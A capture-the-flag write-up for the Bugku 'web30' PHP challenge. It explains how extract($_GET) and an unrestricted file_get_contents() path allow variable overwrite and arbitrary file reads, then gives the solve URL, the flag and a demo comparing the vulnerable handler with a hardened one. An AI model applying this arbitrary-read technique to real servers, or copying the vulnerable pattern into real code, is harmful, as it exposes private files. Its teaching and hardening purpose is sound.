Bugku CTF web30(Web)

0. Open the challenge page and view the PHP source code

Challenge hint: txt????

<?php
extract($_GET);                       // every query-string key becomes a PHP variable: $ac, $fn (and $flag) are attacker-controlled
if (!empty($ac))
{
$f = trim(file_get_contents($fn));    // reads any file path the client supplies
if ($ac === $f)                       // strict comparison against the trimmed file content
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

1. Analyze the code

extract($_GET) registers every GET parameter as a local variable, so the client controls both $fn (the path passed to file_get_contents()) and $ac (the value compared against the file content). The only unknown is which file to read: the hint txt???? together with file_get_contents() suggests a file such as flag.txt exists in the web root.

2. Open flag.txt and view its contents

The file contains bugku, so after trim() the variable $f equals "bugku".

Since the flag is printed when $ac === $f, it is enough to set ac=bugku and fn=flag.txt.

3. Construct the payload: http://114.67.246.176:18068?ac=bugku&&fn=flag.txt (a single & is sufficient; PHP ignores the empty parameter that && produces)

4. Get the flag: flag{20da9eeb08f97e7e86bbf2be25d6e9dc}
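The root cause is the combination of extract($_GET) and an unconstrained path in file_get_contents(), which lets the client read any file the web server can open, not just flag.txt. Below is an added example (not the challenge's code) that puts the vulnerable handler next to a hardened one; the temporary directory, file names and the flag value are placeholders constructed for the demo.

```php
<?php
// Added example, not the challenge's own code. $flag, the directory and the
// file names are placeholders constructed for this demo.

// Vulnerable handler, equivalent to the challenge code: extract() turns every
// query-string key into a local variable, so the client chooses both the file
// path $fn and the comparison value $ac.
function vulnerable(array $get, string $flag): string
{
    extract($get);                            // $ac, $fn (and even $flag) now come from the client
    if (!empty($ac)) {
        $f = trim((string) @file_get_contents($fn));   // arbitrary-path read
        return $ac === $f ? "This is flag: $flag" : "sorry!";
    }
    return "";
}

// Hardened handler: explicit parameter reads, an allow-list of readable files
// confined to one directory, and a constant-time comparison.
function hardened(array $get, string $flag, string $dir): string
{
    $ac = isset($get['ac']) ? (string) $get['ac'] : '';
    $fn = isset($get['fn']) ? (string) $get['fn'] : '';
    if ($ac === '' || $fn === '') {
        return "";
    }
    $allowed = ['challenge.txt'];             // placeholder allow-list
    if (!in_array($fn, $allowed, true)) {
        return "sorry!";
    }
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $fn);
    // Defence in depth: even an allow-listed name must resolve inside $dir.
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return "sorry!";
    }
    $f = trim((string) file_get_contents($path));
    return hash_equals($f, $ac) ? "This is flag: $flag" : "sorry!";
}

// Demo: a constructed temp directory stands in for the web root.
$dir = sys_get_temp_dir() . '/web30_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/challenge.txt", "bugku\n");
file_put_contents("$dir/secret.txt", "s3cret\n");
$flag = 'flag{placeholder}';

// Intended solve: guess the file, read it, and echo its content back as ac.
echo vulnerable(['ac' => 'bugku', 'fn' => "$dir/challenge.txt"], $flag), "\n";
// The same trick works for any readable file, because $fn is unconstrained.
echo vulnerable(['ac' => 's3cret', 'fn' => "$dir/secret.txt"], $flag), "\n";
// Hardened: only the allow-listed file is reachable, traversal is rejected.
echo hardened(['ac' => 'bugku', 'fn' => 'challenge.txt'], $flag, $dir), "\n";
echo hardened(['ac' => 's3cret', 'fn' => '../' . basename($dir) . '/secret.txt'], $flag, $dir), "\n";

array_map('unlink', glob("$dir/*"));
rmdir($dir);
```

Run it with php on the command line. The first two calls print the flag (the second one by reading a file the author never intended to expose), while the hardened handler prints the flag only for the allow-listed file and answers "sorry!" to the traversal attempt. Note that hash_equals() also removes the timing side channel of === on strings of unequal content.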

Origin blog.csdn.net/ChaoYue_miku/article/details/114735849